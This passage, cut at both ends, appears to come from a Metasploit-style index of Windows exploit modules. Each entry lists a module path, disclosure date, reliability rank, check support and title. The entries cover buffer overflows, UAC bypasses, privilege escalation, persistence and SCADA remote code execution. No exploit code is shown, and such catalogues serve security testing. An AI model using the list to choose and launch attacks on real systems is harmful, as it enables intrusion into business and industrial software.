AUTHENTICATE Buffer Overflow - windows/imap/novell_netmail_status 2005-11-18 average No Novell NetMail IMAP STATUS Buffer Overflow - windows/imap/novell_netmail_subscribe 2006-12-23 average No Novell NetMail IMAP SUBSCRIBE Buffer Overflow - windows/isapi/ms00_094_pbserver 2000-12-04 good Yes MS00-094 Microsoft IIS Phone Book Service Overflow - windows/isapi/ms03_022_nsiislog_post 2003-06-25 good Yes MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow - windows/isapi/ms03_051_fp30reg_chunked 2003-11-11 good Yes MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow - windows/isapi/rsa_webagent_redirect 2005-10-21 good Yes Microsoft IIS ISAPI RSA WebAgent Redirect Overflow - windows/isapi/w3who_query 2004-12-06 good Yes Microsoft IIS ISAPI w3who.dll Query String Overflow - windows/ldap/imail_thc 2004-02-17 average No IMail LDAP Service Buffer Overflow - windows/ldap/pgp_keyserver7 2001-07-16 good No Network Associates PGP KeyServer 7 LDAP Buffer Overflow - windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow - windows/license/calicserv_getconfig 2005-03-02 normal Yes Computer Associates License Server GETCONFIG Overflow - windows/license/flexnet_lmgrd_bof 2012-03-23 normal No FlexNet License Server Manager lmgrd Buffer Overflow - windows/license/sentinel_lm7_udp 2005-03-07 average Yes SentinelLM UDP Buffer Overflow - windows/local/adobe_sandbox_adobecollabsync 2013-05-14 great Yes AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass - windows/local/agnitum_outpost_acs 2013-08-02 excellent Yes Agnitum Outpost Internet Security Local Privilege Escalation - windows/local/alpc_taskscheduler 2018-08-27 normal No Microsoft Windows ALPC Task Scheduler Local Privilege Elevation - windows/local/always_install_elevated 2010-03-18 excellent Yes Windows AlwaysInstallElevated MSI - windows/local/applocker_bypass 2015-08-03 excellent No AppLocker Execution Prevention Bypass - windows/local/ask 2012-01-03 excellent No Windows Escalate UAC Execute RunAs - windows/local/bthpan 2014-07-18 average Yes MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation - windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass - windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) - windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) - windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) - windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) - windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS - windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) - windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) - windows/local/capcom_sys_exec 1999-01-01 normal Yes Windows Capcom.sys Kernel Execution Exploit (x64 only) - windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token - windows/local/cve_2017_8464_lnk_lpe 2017-06-13 excellent Yes LNK Code Execution Vulnerability - windows/local/ikeext_service 2012-10-09 good Yes IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL - windows/local/ipass_launch_app 2015-03-12 excellent Yes iPass Mobile Client Service Privilege Escalation - windows/local/lenovo_systemupdate 2015-04-12 excellent Yes Lenovo System Update Privilege Escalation - windows/local/mov_ss 2018-05-08 excellent No Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability - windows/local/mqac_write 2014-07-22 average Yes MQAC.sys Arbitrary Write Privilege Escalation - windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D - windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation - windows/local/ms11_080_afdjoinleaf 2011-11-30 average No MS11-080 AfdJoinLeaf Privilege Escalation - windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation - windows/local/ms13_053_schlamperei 2013-12-01 average Yes Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) - windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page - windows/local/ms13_097_ie_registry_symlink 2013-12-10 great No MS13-097 Registry Symlink IE Sandbox Escape - windows/local/ms14_009_ie_dfsvc 2014-02-11 great Yes MS14-009 .NET Deployment Service IE Sandbox Escape - windows/local/ms14_058_track_popup_menu 2014-10-14 normal Yes Windows TrackPopupMenu Win32k NULL Pointer Dereference - windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference - windows/local/ms15_004_tswbproxy 2015-01-13 good Yes MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape - windows/local/ms15_051_client_copy_image 2015-05-12 normal Yes Windows ClientCopyImage Win32k Exploit - windows/local/ms15_078_atmfd_bof 2015-07-11 manual Yes MS15-078 Microsoft Windows Font Driver Buffer Overflow - windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Yes Windows WMI Recieve Notification Exploit - windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation - windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation - windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC - windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy) - windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference - windows/local/ms_ndproxy 2013-11-27 average Yes MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation - windows/local/novell_client_nicm 2013-05-22 average Yes Novell Client 2 SP3 nicm.sys Local Privilege Escalation - windows/local/novell_client_nwfs 2008-06-26 average No Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation - windows/local/ntapphelpcachecontrol 2014-09-30 normal Yes MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check - windows/local/nvidia_nvsvc 2012-12-25 average Yes Nvidia (nvsvc) Display Driver Service Local Privilege Escalation - windows/local/panda_psevents 2016-06-27 excellent Yes Panda Security PSEvents Privilege Escalation - windows/local/payload_inject 2011-10-12 excellent No Windows Manage Memory Payload Injection - windows/local/persistence 2011-10-19 excellent No Windows Persistent Registry Startup Payload Installer - windows/local/persistence_service 2018-10-20 excellent No Windows Persistent Service Installer - windows/local/powershell_cmd_upgrade 1999-01-01 excellent No Windows Command Shell Upgrade (Powershell) - windows/local/powershell_remoting 1999-01-01 excellent No Powershell Remoting Remote Command Execution - windows/local/ppr_flatten_rec 2013-05-15 average Yes Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation - windows/local/ps_persist 2012-08-14 excellent No Powershell Payload Execution - windows/local/ps_wmi_exec 2012-08-19 excellent No Authenticated WMI Exec via Powershell - windows/local/pxeexploit 2011-08-05 excellent No PXE Exploit Server - windows/local/razer_zwopenprocess 2017-03-22 normal Yes Razer Synapse rzpnk.sys ZwOpenProcess - windows/local/registry_persistence 2015-07-01 excellent Yes Windows Registry Only Persistence - windows/local/run_as 1999-01-01 excellent No Windows Run Command As User - windows/local/s4u_persistence 2013-01-02 excellent No Windows Manage User Level Persistent Payload Installer - windows/local/service_permissions 2012-10-15 great No Windows Escalate Service Permissions Local Privilege Escalation - windows/local/trusted_service_path 2001-10-25 excellent Yes Windows Service Trusted Path Privilege Escalation - windows/local/virtual_box_guest_additions 2014-07-15 average Yes VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation - windows/local/virtual_box_opengl_escape 2014-03-11 average Yes VirtualBox 3D Acceleration Virtual Machine Escape - windows/local/vss_persistence 2011-10-21 excellent No Persistent Payload in Windows Volume Shadow Copy - windows/local/webexec 2018-10-09 good Yes WebEx Local Service Permissions Exploit - windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution - windows/local/wmi_persistence 2017-06-06 normal No WMI Event Subscription Persistence - windows/lotus/domino_http_accept_language 2008-05-20 average No IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow - windows/lotus/domino_icalendar_organizer 2010-09-14 normal Yes IBM Lotus Domino iCalendar MAILTO Buffer Overflow - windows/lotus/domino_sametime_stmux 2008-05-21 average Yes IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow - windows/lotus/lotusnotes_lzh 2011-05-24 normal No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) - windows/lpd/hummingbird_exceed 2005-05-27 average No Hummingbird Connectivity 10 SP5 LPD Buffer Overflow - windows/lpd/niprint 2003-11-05 good No NIPrint LPD Request Overflow - windows/lpd/saplpd 2008-02-04 good No SAP SAPLPD 6.28 Buffer Overflow - windows/lpd/wincomlpd_admin 2008-02-04 good No WinComLPD Buffer Overflow - windows/misc/achat_bof 2014-12-18 normal No Achat Unicode SEH Buffer Overflow - windows/misc/actfax_raw_server_bof 2013-02-05 normal No ActFax 5.01 RAW Server Buffer Overflow - windows/misc/agentxpp_receive_agentx 2010-04-16 good No AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow - windows/misc/allmediaserver_bof 2012-07-04 normal No ALLMediaServer 0.8 Buffer Overflow - windows/misc/altiris_ds_sqli 2008-05-15 normal Yes Symantec Altiris DS SQL Injection - windows/misc/apple_quicktime_rtsp_response 2007-11-23 normal No Apple QuickTime 7.3 RTSP Response Header Buffer Overflow - windows/misc/asus_dpcproxy_overflow 2008-03-21 average No Asus Dpcproxy Buffer Overflow - windows/misc/avaya_winpmd_unihostrouter 2011-05-23 normal No Avaya WinPMD UniteHostRouter Buffer Overflow - windows/misc/avidphoneticindexer 2011-11-29 normal No Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow - windows/misc/bakbone_netvault_heap 2005-04-01 average Yes BakBone NetVault Remote Heap Overflow - windows/misc/bcaaa_bof 2011-04-04 good No Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow - windows/misc/bigant_server 2008-04-15 average No BigAnt Server 2.2 Buffer Overflow - windows/misc/bigant_server_250 2008-04-15 great No BigAnt Server 2.50 SP1 Buffer Overflow - windows/misc/bigant_server_dupf_upload 2013-01-09 excellent No BigAnt Server DUPF Command Arbitrary File Upload - windows/misc/bigant_server_sch_dupf_bof 2013-01-09 normal No BigAnt Server 2 SCH And DUPF Buffer Overflow - windows/misc/bigant_server_usv 2009-12-29 great No BigAnt Server 2.52 USV Buffer Overflow - windows/misc/bomberclone_overflow 2006-02-16 average No Bomberclone 0.11.6 Buffer Overflow - windows/misc/bopup_comm 2009-06-18 good No Bopup Communications Server Buffer Overflow - windows/misc/borland_interbase 2007-07-24 average No Borland Interbase Create-Request Buffer Overflow - windows/misc/borland_starteam 2008-04-02 average No Borland CaliberRM StarTeam Multicast Service Buffer Overflow - windows/misc/citrix_streamprocess 2011-01-20 good No Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow - windows/misc/citrix_streamprocess_data_msg 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow - windows/misc/citrix_streamprocess_get_boot_record_request 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow - windows/misc/citrix_streamprocess_get_footer 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow - windows/misc/citrix_streamprocess_get_objects 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow - windows/misc/cloudme_sync 2018-01-17 great No CloudMe Sync v1.10.9 - windows/misc/commvault_cmd_exec 2017-12-12 good No Commvault Communications Service (cvd) Command Injection - windows/misc/disk_savvy_adm 2017-01-31 great No Disk Savvy Enterprise v10.4.18 - windows/misc/doubletake 2008-06-04 average No DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow - windows/misc/eiqnetworks_esa 2006-07-24 average No eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow - windows/misc/eiqnetworks_esa_topology 2006-07-25 average No eIQNetworks ESA Topology DELETEDEVICE Overflow - windows/misc/enterasys_netsight_syslog_bof 2011-12-19 normal No Enterasys NetSight nssyslogd.exe Buffer Overflow - windows/misc/eureka_mail_err 2009-10-22 normal No Eureka Email 2.2q ERR Remote Buffer Overflow - windows/misc/fb_cnct_group 2013-01-31 normal Yes Firebird Relational Database CNCT Group Number Buffer Overflow - windows/misc/fb_isc_attach_database 2007-10-03 average No Firebird Relational Database isc_attach_database() Buffer Overflow - windows/misc/fb_isc_create_database 2007-10-03 average No Firebird Relational Database isc_create_database() Buffer Overflow - windows/misc/fb_svc_attach 2007-10-03 average No Firebird Relational Database SVC_attach() Buffer Overflow - windows/misc/gh0st 2017-07-27 normal Yes Gh0st Client buffer Overflow - windows/misc/gimp_script_fu 2012-05-18 normal No GIMP script-fu Server Buffer Overflow - windows/misc/hp_dataprotector_cmd_exec 2014-11-02 excellent Yes HP Data Protector 8.10 Remote Command Execution - windows/misc/hp_dataprotector_crs 2013-06-03 normal Yes HP Data Protector Cell Request Service Buffer Overflow - windows/misc/hp_dataprotector_dtbclslogin 2010-09-09 normal Yes HP Data Protector DtbClsLogin Buffer Overflow - windows/misc/hp_dataprotector_encrypted_comms 2016-04-18 normal Yes HP Data Protector Encrypted Communication Remote Command Execution - windows/misc/hp_dataprotector_exec_bar 2014-01-02 excellent Yes HP Data Protector Backup Client Service Remote Code Execution - windows/misc/hp_dataprotector_install_service 2011-11-02 excellent Yes HP Data Protector 6.10/6.11/6.20 Install Service - windows/misc/hp_dataprotector_new_folder 2012-03-12 normal No HP Data Protector Create New Folder Buffer Overflow - windows/misc/hp_dataprotector_traversal 2014-01-02 great Yes HP Data Protector Backup Client Service Directory Traversal - windows/misc/hp_imc_dbman_restartdb_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestartDB Unauthenticated RCE - windows/misc/hp_imc_dbman_restoredbase_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestoreDBase Unauthenticated RCE - windows/misc/hp_imc_uam 2012-08-29 normal No HP Intelligent Management Center UAM Buffer Overflow - windows/misc/hp_loadrunner_magentproc 2013-07-27 normal No HP LoadRunner magentproc.exe Overflow - windows/misc/hp_loadrunner_magentproc_cmdexec 2010-05-06 excellent No HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution - windows/misc/hp_magentservice 2012-01-12 average No HP Diagnostics Server magentservice.exe Overflow - windows/misc/hp_omniinet_1 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow - windows/misc/hp_omniinet_2 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow - windows/misc/hp_omniinet_3 2011-06-29 great Yes HP OmniInet.exe Opcode 27 Buffer Overflow - windows/misc/hp_omniinet_4 2011-06-29 good No HP OmniInet.exe Opcode 20 Buffer Overflow - windows/misc/hp_operations_agent_coda_34 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow - windows/misc/hp_operations_agent_coda_8c 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow - windows/misc/hp_ovtrace 2007-08-09 average No HP OpenView Operations OVTrace Buffer Overflow - windows/misc/hta_server 2016-10-06 manual No HTA Web Server - windows/misc/ib_isc_attach_database 2007-10-03 good No Borland InterBase isc_attach_database() Buffer Overflow - windows/misc/ib_isc_create_database 2007-10-03 good No Borland InterBase isc_create_database() Buffer Overflow - windows/misc/ib_svc_attach 2007-10-03 good No Borland InterBase SVC_attach() Buffer Overflow - windows/misc/ibm_cognos_tm1admsd_bof 2012-04-02 normal No IBM Cognos tm1admsd.exe Overflow - windows/misc/ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL Injection - windows/misc/ibm_tsm_cad_ping 2009-11-04 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow - windows/misc/ibm_tsm_rca_dicugetidentify 2009-11-04 great No IBM Tivoli Storage Manager Express RCA Service Buffer Overflow - windows/misc/ibm_websphere_java_deserialize 2015-11-06 excellent No IBM WebSphere RCE Java Deserialization Vulnerability - windows/misc/itunes_extm3u_bof 2012-06-21 normal No Apple iTunes 10 Extended M3U Stack Buffer Overflow - windows/misc/landesk_aolnsrvr 2007-04-13 average No LANDesk Management Suite 8.7 Alert Service Buffer Overflow - windows/misc/lianja_db_net 2013-05-22 normal Yes Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow - windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution - windows/misc/mercury_phonebook 2005-12-19 average No Mercury/32 PH Server Module Buffer Overflow - windows/misc/mini_stream 2009-12-25 normal No Mini-Stream 3.0.1.1 Buffer Overflow - windows/misc/mirc_privmsg_server 2008-10-02 normal No mIRC PRIVMSG Handling Stack Buffer Overflow - windows/misc/ms07_064_sami 2007-12-11 normal No MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow - windows/misc/ms10_104_sharepoint 2010-12-14 excellent Yes MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution - windows/misc/netcat110_nt 2004-12-27 great No Netcat v1.10 NT Stack Buffer Overflow - windows/misc/nettransport 2010-01-02 normal No NetTransport Download Manager 2.90.510 Buffer Overflow - windows/misc/nvidia_mental_ray 2013-12-10 excellent No Nvidia Mental Ray Satellite Service Arbitrary DLL Injection - windows/misc/plugx 2017-07-27 normal Yes PlugX Controller Stack Overflow - windows/misc/poisonivy_21x_bof 2016-06-03 normal Yes Poison Ivy 2.1.x C2 Buffer Overflow - windows/misc/poisonivy_bof 2012-06-24 normal Yes Poison Ivy Server Buffer Overflow - windows/misc/poppeeper_date 2009-02-27 normal No POP Peeper v3.4 DATE Buffer Overflow - windows/misc/poppeeper_uidl 2009-02-27 normal No POP Peeper v3.4 UIDL Buffer Overflow - windows/misc/realtek_playlist 2008-12-16 great No Realtek Media Player Playlist Buffer Overflow - windows/misc/sap_2005_license 2009-08-01 great No SAP Business One License Manager 2005 Buffer Overflow - windows/misc/sap_netweaver_dispatcher 2012-05-08 normal No SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow - windows/misc/shixxnote_font 2004-10-04 great No ShixxNOTE 6.net Font Field Overflow - windows/misc/solidworks_workgroup_pdmwservice_file_write 2014-02-22 good Yes SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write - windows/misc/splayer_content_type 2011-05-04 normal No SPlayer 3.7 Content-Type Buffer Overflow - windows/misc/stream_down_bof 2011-12-27 good No CoCSoft StreamDown 6.8.0 Buffer Overflow - windows/misc/talkative_response 2009-03-17 normal No Talkative IRC v0.4.4.16 Response Buffer Overflow - windows/misc/tiny_identd_overflow 2007-05-14 average No TinyIdentD 2.2 Stack Buffer Overflow - windows/misc/trendmicro_cmdprocessor_addtask 2011-12-07 good No TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow - windows/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow - windows/misc/vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL Side Loading Vulnerability in VMware Host Guest Client Redirector - windows/misc/webdav_delivery 1999-01-01 manual No Serve DLL via webdav server - windows/misc/windows_rsh 2007-07-24 average No Windows RSH Daemon Buffer Overflow - windows/misc/wireshark_lua 2011-07-18 excellent No Wireshark console.lua Pre-Loading Script Execution - windows/misc/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow - windows/mmsp/ms10_025_wmss_connect_funnel 2010-04-13 great No Windows Media Services ConnectFunnel Stack Buffer Overflow - windows/motorola/timbuktu_fileupload 2008-05-10 excellent No Timbuktu Pro Directory Traversal/File Upload - windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent No Lyris ListManager MSDE Weak sa Password - windows/mssql/ms02_039_slammer 2002-07-24 good Yes MS02-039 Microsoft SQL Server Resolution Overflow - windows/mssql/ms02_056_hello 2002-08-05 good Yes MS02-056 Microsoft SQL Server Hello Overflow - windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption - windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection - windows/mssql/mssql_clr_payload 1999-01-01 excellent Yes Microsoft SQL Server Clr Stored Procedure Payload Execution - windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution - windows/mssql/mssql_payload 2000-05-30 excellent Yes Microsoft SQL Server Payload Execution - windows/mssql/mssql_payload_sqli 2000-05-30 excellent No Microsoft SQL Server Payload Execution via SQL Injection - windows/mysql/mysql_mof 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows MOF Execution - windows/mysql/mysql_start_up 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows FILE Privilege Abuse - windows/mysql/mysql_yassl_hello 2008-01-04 average No MySQL yaSSL SSL Hello Message Buffer Overflow - windows/mysql/scrutinizer_upload_exec 2012-07-27 excellent Yes Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential - windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow - windows/nntp/ms05_030_nntp 2005-06-14 normal No MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow - windows/novell/file_reporter_fsfui_upload 2012-11-16 great No NFR Agent FSFUI Record File Upload RCE - windows/novell/groupwisemessenger_client 2008-07-02 normal No Novell GroupWise Messenger Client Buffer Overflow - windows/novell/netiq_pum_eval 2012-11-15 excellent Yes NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution - windows/novell/nmap_stor 2006-12-23 average No Novell NetMail NMAP STOR Buffer Overflow - windows/novell/zenworks_desktop_agent 2005-05-19 good No Novell ZENworks 6.5 Desktop/Server Management Overflow - windows/novell/zenworks_preboot_op21_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow - windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow - windows/novell/zenworks_preboot_op6_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow - windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow - windows/oracle/client_system_analyzer_upload 2011-01-18 excellent Yes Oracle Database Client System Analyzer Arbitrary File Upload - windows/oracle/extjob 2007-01-01 excellent Yes Oracle Job Scheduler Named Pipe Command Execution - windows/oracle/osb_ndmp_auth 2009-01-14 good No Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow - windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow - windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow - windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow - windows/pop3/seattlelab_pass 2003-05-07 great No Seattle Lab Mail 5.5 POP3 Buffer Overflow - windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution - windows/proxy/bluecoat_winproxy_host 2005-01-05 great No Blue Coat WinProxy Host Header Overflow - windows/proxy/ccproxy_telnet_ping 2004-11-11 average Yes CCProxy Telnet Proxy Ping Overflow - windows/proxy/proxypro_http_get 2004-02-23 great No Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow - windows/proxy/qbik_wingate_wwwproxy 2006-06-07 good Yes Qbik WinGate WWW Proxy Server URL Processing Overflow - windows/scada/abb_wserver_exec 2013-04-05 excellent Yes ABB MicroSCADA wserver.exe Remote Code Execution - windows/scada/advantech_webaccess_dashboard_file_upload 2016-02-05 excellent Yes Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload - windows/scada/advantech_webaccess_webvrpcs_bof 2017-11-02 good No Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow - windows/scada/citect_scada_odbc 2008-06-11 normal No CitectSCADA/CitectFacilities ODBC Buffer Overflow - windows/scada/codesys_gateway_server_traversal 2013-02-02 excellent No SCADA 3S CoDeSys Gateway Server Directory Traversal - windows/scada/codesys_web_server 2011-12-02 normal Yes SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow - windows/scada/daq_factory_bof 2011-09-13 good No DaqFactory HMI NETB Request Overflow - windows/scada/delta_ia_commgr_bof 2018-07-02 normal No Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow - windows/scada/factorylink_csservice 2011-03-25 normal No Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow - windows/scada/factorylink_vrn_09 2011-03-21 average No Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow - windows/scada/ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY gefebt.exe Remote Code Execution - windows/scada/iconics_genbroker 2011-03-21 good No Iconics GENESIS32 Integer Overflow Version 9.21.201.01 - windows/scada/iconics_webhmi_setactivexguid 2011-05-05 good No ICONICS WebHMI ActiveX Buffer Overflow - windows/scada/igss9_igssdataserver_listall 2011-03-24 good No 7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow - windows/scada/igss9_igssdataserver_rename 2011-03-24 normal No 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow - windows/scada/igss9_misc 2011-03-24 excellent No 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities - windows/scada/igss_exec_17 2011-03-21 excellent No Interactive Graphical SCADA System Remote Command Injection - windows/scada/indusoft_webstudio_exec 2011-11-04 excellent Yes InduSoft Web Studio Arbitrary Upload Remote Code Execution - windows/scada/moxa_mdmtool 2010-10-20 great No MOXA Device Manager Tool 2.1 Buffer Overflow - windows/scada/procyon_core_server 2011-09-08 normal Yes Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow - windows/scada/realwin 2008-09-26 great No DATAC RealWin SCADA Server Buffer Overflow - windows/scada/realwin_on_fc_binfile_a 2011-03-21 great No DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow - windows/scada/realwin_on_fcs_login 2011-03-21 great No RealWin SCADA Server DATAC Login Buffer Overflow - windows/scada/realwin_scpc_initialize 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow - windows/scada/realwin_scpc_initialize_rf 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow - windows/scada/realwin_scpc_txtevent 2010-11-18 great No DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow - windows/scada/scadapro_cmdexe 2011-09-16 excellent No Measuresoft ScadaPro Remote Command Execution - windows/scada/sunway_force_control_netdbsrv 2011-09-22 great No Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57 - windows/scada/winlog_runtime 2011-01-13 great No Sielco Sistemi Winlog Buffer Overflow - windows/scada/winlog_runtime_2 2012-06-04 normal No Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16 - windows/scada/yokogawa_bkbcopyd_bof 2014-03-10 normal Yes Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow - windows/scada/yokogawa_bkesimmgr_bof 2014-03-10 normal Yes Yokogawa CS3000 BKESimmgr.exe Buffer Overflow - windows/scada/yokogawa_bkfsim_vhfd 2014-05-23 normal No Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow - windows/scada/yokogawa_bkhodeq_bof 2014-03-10 average Yes Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow - windows/sip/aim_triton_cseq 2006-07-10 great No AIM Triton 1.0.4 CSeq Buffer Overflow - windows/sip/sipxezphone_cseq 2006-07-10 great No SIPfoundry sipXezPhone 0.35a CSeq Field Overflow - windows/sip/sipxphone_cseq 2006-07-10 great No SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow - windows/smb/generic_smb_dll_injection 2015-03-04 manual No Generic DLL Injection From Shared Resource - windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource - windows/smb/ipass_pipe_exec 2015-01-21 excellent Yes IPass Control Pipe Remote Command Execution - windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow - windows/smb/ms04_007_killbill 2004-02-10 low No MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow - windows/smb/ms04_011_lsass 2004-04-13 good No MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow - windows/smb/ms04_031_netdde 2004-10-12 good No MS04-031 Microsoft NetDDE Service Overflow - windows/smb/ms05_039_pnp 2005-08-09 good Yes MS05-039 Microsoft Plug and Play Service Overflow - windows/smb/ms06_025_rasmans_reg 2006-06-13 good No MS06-025 Microsoft RRAS Service RASMAN Registry Overflow - windows/smb/ms06_025_rras 2006-06-13 average No MS06-025 